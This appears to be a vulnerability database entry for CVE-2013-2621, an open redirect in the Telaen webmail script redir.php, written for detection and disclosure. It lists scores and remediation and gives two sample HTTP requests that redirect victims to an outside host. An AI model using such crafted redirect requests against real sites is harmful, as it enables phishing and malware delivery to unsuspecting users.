🔙 목록으로 돌아가기

CVE-2013-2621: Telaen => v1.3.1 - Open Redirect

TitleTelaen => v1.3.1 - Open Redirect
Authorctflearner
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
RemediationUpgrade to the latest version of Telaen to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.1019
CVE IDCVE-2013-2621
CWE IDCWE-601
Tags cve2013 cve telaen redirect telaen_project vuln

🔍 Vulnerability Description

Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.

🌐 HTTP Request

GET /telaen/redir.php?https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /redir.php?https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.13 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-2621.yaml

🦈 Packet Capture: ⬇️ Download cve-2013-2621.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A